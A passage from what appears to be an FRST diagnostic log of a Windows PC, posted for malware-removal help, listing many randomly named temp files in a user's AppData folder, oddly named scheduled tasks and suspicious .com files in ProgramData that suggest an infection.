2022-03-22 18:20 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\zmabqBm.tmp
2022-03-22 17:24 - 2022-03-22 17:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\pddmtsw.tmp
2022-03-22 17:24 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\flwKCyx.tmp
2022-03-22 16:19 - 2022-03-23 08:05 - 000003754 _____
C:\WINDOWS\system32\Tasks\asdsdasdjikindasddeyu
2022-03-22 16:02 - 2022-03-22 15:31 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\GK.xB.H.tmp
2022-03-22 16:02 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\hHKvy.s.tmp
2022-03-22 14:53 - 2022-03-22 14:53 - 000003770 _____
C:\WINDOWS\system32\Tasks\asdaddddasdadsddasdeyu
2022-03-22 14:53 - 2020-10-14 07:54 - 000452608 _____ (Microsoft Corporation)
C:\ProgramData\timagar.com
2022-03-22 14:12 - 2022-03-22 13:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\xbfAl.r.tmp
2022-03-22 14:12 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\DgkIlaH.tmp
2022-03-22 13:44 - 2022-03-22 13:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\rGjizBd.tmp
2022-03-22 13:44 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\kawiKkt.tmp
2022-03-22 13:18 - 2022-03-22 13:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\KAJdHsx.tmp
2022-03-22 13:18 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\kaampdk.tmp
2022-03-22 13:12 - 2022-03-22 13:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\c.pmfr..tmp
2022-03-22 13:12 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\FkyDzBg.tmp
2022-03-22 11:55 - 2022-03-23 08:25 - 000000000 ____D C:\Users\Karin
Hostetler\AppData\Local\Microsoft Vision
2022-03-22 11:35 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\.yvbevo.tmp
2022-03-22 11:35 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\CqicpoE.tmp
2022-03-22 11:11 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\imec.rK.tmp
2022-03-22 11:11 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\.wB.u.k.tmp
2022-03-22 10:40 - 2022-03-22 10:40 - 000000000 ____D C:\Users\Karin
Hostetler\AppData\Local\mbam
2022-03-22 10:34 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\x.fkmhm.tmp
2022-03-22 10:34 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\.AInoHs.tmp
2022-03-22 09:12 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\hHpH.vg.tmp
2022-03-22 09:12 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\.Fixosu.tmp
2022-03-22 07:50 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\As.e.Iq.tmp
2022-03-22 07:50 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\u.vBKhg.tmp
2022-03-22 06:28 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\FHm.CCw.tmp
2022-03-22 06:28 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\G.zIGwn.tmp
2022-03-22 05:50 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\uebnfhx.tmp
2022-03-22 05:50 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\FqFql.I.tmp
2022-03-22 05:30 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\vowws.H.tmp
2022-03-22 05:30 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\.BahC.h.tmp
2022-03-22 05:06 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\zBllBya.tmp
2022-03-22 05:06 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\qcmJyrv.tmp
2022-03-22 04:04 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\BcvEhIh.tmp
2022-03-22 04:04 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\hKKAJt..tmp
2022-03-22 03:51 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\H.FnrcA.tmp
2022-03-22 03:51 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\FcfgK.l.tmp
2022-03-22 03:44 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\JBAeesf.tmp
2022-03-22 03:44 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\.yvkw.y.tmp
2022-03-22 03:05 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\GyhgfDG.tmp
2022-03-22 03:05 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\rGHtFCn.tmp
2022-03-22 03:00 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\pzvEJ.c.tmp
2022-03-22 03:00 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\cxuionk.tmp
2022-03-22 02:22 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\zatwfvJ.tmp
2022-03-22 02:22 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\KaAzBzg.tmp
2022-03-22 01:46 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\zIBKqww.tmp
2022-03-22 01:46 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\EAyEynk.tmp
2022-03-22 01:00 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\BvqpwdK.tmp
2022-03-22 01:00 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\yc.Kam..tmp
2022-03-21 23:38 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\cbmkybA.tmp
2022-03-21 23:38 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\Io..gvn.tmp
2022-03-21 22:16 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\CrKgBBd.tmp
2022-03-21 22:16 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\tgIysyi.tmp
2022-03-21 20:54 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\EDhbFIz.tmp
2022-03-21 20:54 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\nGtAkFz.tmp
2022-03-21 20:37 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\vCkilCq.tmp
2022-03-21 20:37 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\EaBiAea.tmp
2022-03-21 19:32 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\CisKbHh.tmp
2022-03-21 19:32 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\.r.ubyg.tmp
2022-03-21 18:35 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\migEyFu.tmp
2022-03-21 18:35 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\.tyCkte.tmp
2022-03-21 18:32 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\EygEhJE.tmp
2022-03-21 18:32 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\Ja.AJly.tmp
2022-03-21 18:10 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\hgJmzHc.tmp
2022-03-21 18:10 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\lfjDy.A.tmp
2022-03-21 18:05 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\bwyFtJD.tmp
2022-03-21 18:05 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\d.KvBEk.tmp
2022-03-21 17:13 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\hGmrugl.tmp
2022-03-21 17:13 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\CFCbraa.tmp
2022-03-21 17:13 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\swhi.Fm.tmp
2022-03-21 17:13 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\GuyFxhj.tmp
2022-03-21 16:52 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\zkKIqmK.tmp
2022-03-21 16:52 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\oCGeaDq.tmp
2022-03-21 16:48 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\iewoixB.tmp
2022-03-21 16:48 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\IvocJvb.tmp
2022-03-21 16:47 - 2022-03-23 08:25 - 000003730 _____
C:\WINDOWS\system32\Tasks\microWord
2022-03-21 15:25 - 2022-03-21 15:25 - 000003768 _____
C:\WINDOWS\system32\Tasks\calendersw
2022-03-21 15:25 - 2020-10-14 07:54 - 000433152 _____ (Microsoft Corporation)
C:\ProgramData\ESETNONU.com
2022-03-21 15:25 - 2019-12-07 05:10 - 000013312 _____ (Microsoft Corporation)
C:\ProgramData\milon.com
2022-03-21 15:24 - 2019-12-07 05:10 - 000013312 _____ (Microsoft Corporation)
C:\ProgramData\ddond.com
2022-03-08 22:28 - 2022-03-08 22:28 - 000011911 _____
C:\WINDOWS\system32\DrtmAuthTxt.wim
2022-03-08 22:27 - 2022-03-08 22:27 - 002254336 _____
C:\WINDOWS\system32\dwmscene.dll
2022-03-08 22:27 - 2022-03-08 22:27 - 000223744 _____
C:\WINDOWS\SysWOW64\TpmTool.exe
2022-03-08 22:26 - 2022-03-08 22:26 - 002260992 _____
C:\WINDOWS\system32\TextInputMethodFormatter.dll
2022-03-08 22:25 - 2022-03-08 22:25 - 000272896 _____
C:\WINDOWS\system32\TpmTool.exe
2022-03-08 21:33 - 2022-03-08 21:33 - 000000000 ___HD C:\$WinREAgent
2022-02-28 10:53 - 2022-02-28 10:56 - 000050176 _____ C:\Users\Karin
Hostetler\Desktop\TV CHANNELL LISTINGS.xls
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2022-03-23 08:57 - 2016-11-16 18:30 - 000000000 ____D C:\ProgramData\Temp
2022-03-23 08:53 - 2021-11-12 10:06 - 000000000 ____D C:\Users\Karin
Hostetler\Desktop\Delete
2022-03-23 08:39 - 2019-12-07 05:14 - 000000000 ____D
C:\ProgramData\regid.1991-06.com.microsoft
2022-03-23 08:29 - 2017-03-11 18:41 - 000000000 ____D C:\Program Files
(x86)\Google
2022-03-23 08:23 - 2020-09-29 09:05 - 000000000 ____D
C:\WINDOWS\system32\SleepStudy
2022-03-23 08:15 - 2019-03-04 15:13 - 000002081 _____
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat Distiller
DC.lnk
2022-03-23 08:15 - 2019-03-04 15:13 - 000002070 _____
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat DC.lnk
2022-03-22 20:52 - 2018-05-18 13:03 - 000000000 ____D C:\Users\Karin
Hostetler\AppData\Local\Host App Service
2022-03-22 14:41 - 2019-10-01 13:02 - 000000000 ___HD
C:\Users\Public\Documents\AdobeGCData
2022-03-22 14:33 - 2020-09-29 09:21 - 000844670 _____
C:\WINDOWS\system32\PerfStringBackup.INI
2022-03-22 14:33 - 2019-12-07 05:13 - 000000000 ____D C:\WINDOWS\INF
2022-03-22 14:27 - 2020-09-29 09:37 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2022-03-22 14:27 - 2020-09-29 09:05 - 000008192 ___SH C:\DumpStack.log.tmp
2022-03-22 14:27 - 2019-12-07 05:14 - 000000000 ____D C:\WINDOWS\ServiceState
2022-03-22 14:26 - 2019-12-07 05:03 - 000524288 _____
C:\WINDOWS\system32\config\BBI
2022-03-22 14:26 - 2017-06-04 15:52 - 000065536 _____
C:\WINDOWS\system32\spu_storage.bin
2022-03-22 13:11 - 2019-12-07 05:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2022-03-22 13:11 - 2019-12-07 05:03 - 000032768 _____
C:\WINDOWS\system32\config\ELAM
2022-03-22 10:19 - 2017-11-27 10:47 - 000000507 _____ C:\WINDOWS\Brpfx04a.ini
2022-03-22 08:45 - 2017-05-09 21:00 - 000002103 _____
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2022-03-21 16:31 - 2017-03-11 18:47 - 000002268 _____
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2022-03-19 09:56 - 2020-06-29 08:08 - 000002405 _____
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2022-03-19 09:56 - 2019-12-07 05:14 - 000000000 ___HD C:\Program
Files\WindowsApps
2022-03-19 09:56 - 2019-12-07 05:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2022-03-14 19:26 - 2018-03-01 09:07 - 000000000 ____D
C:\WINDOWS\system32\Drivers\wd
2022-03-14 09:03 - 2018-09-13 12:46 - 000015360 ____H C:\Users\Karin
Hostetler\Desktop\photothumb.db
2022-03-11 21:51 - 2021-12-12 12:56 - 000003588 _____
C:\WINDOWS\system32\Tasks\OneDrive Reporting
Task-S-1-5-21-1394640484-365018484-2708498470-1001
2022-03-11 21:51 - 2020-09-29 09:37 - 000003398 _____
C:\WINDOWS\system32\Tasks\OneDrive Standalone Update
Task-S-1-5-21-1394640484-365018484-2708498470-1001
2022-03-11 21:51 - 2020-09-29 01:24 - 000002462 _____ C:\Users\Karin
Hostetler\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2022-03-11 19:13 - 2020-09-29 09:05 - 000490832 _____
C:\WINDOWS\system32\FNTCACHE.DAT
2022-03-11 19:08 - 2019-12-07 05:14 - 000000000 ___RD
C:\WINDOWS\ImmersiveControlPanel
2022-03-11 19:08 - 2019-12-07 05:14 - 000000000 ____D C:\WINDOWS\SystemResources
2022-03-11 19:08 - 2019-12-07 05:14 - 000000000 ____D
C:\WINDOWS\system32\WinBioPlugIns
2022-03-11 19:08 - 2019-12-07 05:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2022-03-11 19:08 - 2019-12-07 05:14 - 000000000 ____D C:\WINDOWS\system32\migwiz
2022-03-11 19:08 - 2019-12-07 05:14 - 000000000 ____D
C:\WINDOWS\PolicyDefinitions
2022-03-11 19:08 - 2019-12-07 05:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2022-03-11 19:08 - 2019-12-07 05:03 - 000000000 ____D C:\WINDOWS\servicing
2022-03-08 23:49 - 2020-09-29 09:37 - 000003480 _____
C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2022-03-08 23:49 - 2020-09-29 09:37 - 000003356 _____
C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2022-03-08 22:47 - 2019-12-07 05:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2022-03-08 22:25 - 2020-09-29 09:09 - 002877952 _____ (Microsoft Corporation)
C:\WINDOWS\SysWOW64\PrintConfig.dll
2022-03-08 21:32 - 2021-02-19 17:53 - 000000000 ____D C:\Program Files\Microsoft
Update Health Tools
2022-03-08 21:32 - 2017-03-12 12:22 - 000000000 ____D C:\WINDOWS\system32\MRT
2022-03-08 21:15 - 2017-03-12 12:22 - 145666720 ____C (Microsoft Corporation)
C:\WINDOWS\system32\MRT.exe
==================== Files in the root of some directories ========
2021-09-26 23:19 - 2021-09-26 23:20 - 000046009 __RSH () C:\Program Files
(x86)\DLS8Uninstall.log
2017-03-11 19:04 - 2017-03-11 19:04 - 022762520 _____ (LastPass) C:\Program
Files (x86)\Common Files\lpuninstall.exe
2022-03-22 10:34 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\.AInoHs.tmp
2022-03-22 05:30 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\.BahC.h.tmp
2022-03-23 00:14 - 2022-03-22 21:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\.DmrCyx.tmp
2022-03-23 05:42 - 2022-03-23 05:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\.EipzDA.tmp
2022-03-22 09:12 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\.Fixosu.tmp
2022-03-22 18:46 - 2022-03-22 17:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\.gq.eEv.tmp
2022-03-21 19:32 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\.r.ubyg.tmp
2022-03-21 18:35 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\.tyCkte.tmp
2022-03-22 11:11 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\.wB.u.k.tmp
2022-03-22 11:35 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\.yvbevo.tmp
2022-03-22 03:44 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\.yvkw.y.tmp
2022-03-22 20:05 - 2022-03-22 19:54 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\abF.FyJ.tmp
2022-03-22 20:05 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\AfKprbo.tmp
2022-03-22 07:50 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\As.e.Iq.tmp
2022-03-23 08:26 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\B.mvKwd.tmp
2022-03-22 04:04 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\BcvEhIh.tmp
2022-03-23 02:58 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\bvcozKc.tmp
2022-03-22 01:00 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\BvqpwdK.tmp
2022-03-21 18:05 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\bwyFtJD.tmp
2022-03-22 13:12 - 2022-03-22 13:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\c.pmfr..tmp
2022-03-21 23:38 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\cbmkybA.tmp
2022-03-21 17:13 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\CFCbraa.tmp
2022-03-21 19:32 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\CisKbHh.tmp
2022-03-22 11:35 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\CqicpoE.tmp
2022-03-21 22:16 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\CrKgBBd.tmp
2022-03-22 03:00 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\cxuionk.tmp
2022-03-21 18:05 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\d.KvBEk.tmp
2022-03-22 14:12 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\DgkIlaH.tmp
2022-03-21 20:37 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\EaBiAea.tmp
2022-03-22 01:46 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\EAyEynk.tmp
2022-03-21 20:54 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\EDhbFIz.tmp
2022-03-21 18:32 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\EygEhJE.tmp
2022-03-22 03:51 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\FcfgK.l.tmp
2022-03-22 22:52 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\fhIqKrG.tmp
2022-03-22 06:28 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\FHm.CCw.tmp
2018-01-16 15:31 - 2018-01-16 15:38 - 000321421 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\FileDrTool.log
2022-03-23 07:04 - 2022-03-23 05:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\Fkhvfuv.tmp
2022-03-22 13:12 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\FkyDzBg.tmp
2022-03-22 17:24 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\flwKCyx.tmp
2022-03-23 05:42 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\FooEDIz.tmp
2022-03-22 05:50 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\FqFql.I.tmp
2022-03-22 06:28 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\G.zIGwn.tmp
2022-03-23 01:36 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\gelfCgB.tmp
2022-03-22 16:02 - 2022-03-22 15:31 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\GK.xB.H.tmp
2022-03-21 17:13 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\GuyFxhj.tmp
2022-03-22 03:05 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\GyhgfDG.tmp
2022-03-22 21:30 - 2022-03-22 21:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\h.dA..r.tmp
2022-03-22 03:51 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\H.FnrcA.tmp
2022-03-22 18:20 - 2022-03-22 17:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\hc.Ekso.tmp
2022-03-22 22:52 - 2022-03-22 21:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\hdpl.A..tmp
2022-03-21 18:10 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\hgJmzHc.tmp
2022-03-21 17:13 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\hGmrugl.tmp
2022-03-22 16:02 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\hHKvy.s.tmp
2022-03-22 09:12 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\hHpH.vg.tmp
2022-03-22 04:04 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\hKKAJt..tmp
2022-03-23 04:55 - 2022-03-23 01:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\ianksBp.tmp
2022-03-21 16:48 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\iewoixB.tmp
2022-03-23 07:04 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\IlxrjIs.tmp
2022-03-22 11:11 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\imec.rK.tmp
2022-03-21 23:38 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\Io..gvn.tmp
2022-03-21 16:48 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\IvocJvb.tmp
2022-03-21 18:32 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\Ja.AJly.tmp
2022-03-22 03:44 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\JBAeesf.tmp
2022-03-22 20:08 - 2022-03-22 19:54 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\jKsc.Db.tmp
2022-03-22 13:18 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\kaampdk.tmp
2022-03-22 02:22 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\KaAzBzg.tmp
2022-03-22 13:18 - 2022-03-22 13:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\KAJdHsx.tmp
2022-03-22 13:44 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\kawiKkt.tmp
2022-03-22 18:46 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\Kjvon.z.tmp
2022-03-21 18:10 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\lfjDy.A.tmp
2022-03-23 04:55 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\ljesr.e.tmp
2022-03-21 18:35 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\migEyFu.tmp
2022-03-23 08:26 - 2022-03-23 07:55 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\myciaB..tmp
2022-03-21 20:54 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\nGtAkFz.tmp
2022-03-21 16:52 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\oCGeaDq.tmp
2022-03-23 02:58 - 2022-03-23 01:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\pAsnGil.tmp
2022-03-22 17:24 - 2022-03-22 17:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\pddmtsw.tmp
2022-03-22 21:30 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\pF.Fltn.tmp
2022-03-22 03:00 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\pzvEJ.c.tmp
2017-03-12 13:05 - 2021-07-20 16:29 - 000228094 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\QBFileDrTool.log
2018-07-10 13:37 - 2022-01-26 12:42 - 002581623 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\QBFileDrTool_DESKTOP-ID6UD18.log
2022-03-22 05:06 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\qcmJyrv.tmp
2020-02-05 01:50 - 2021-09-09 06:40 - 000000043 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\restoreulip.ini
2022-03-22 03:05 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\rGHtFCn.tmp
2022-03-22 13:44 - 2022-03-22 13:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\rGjizBd.tmp
2022-03-21 17:13 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
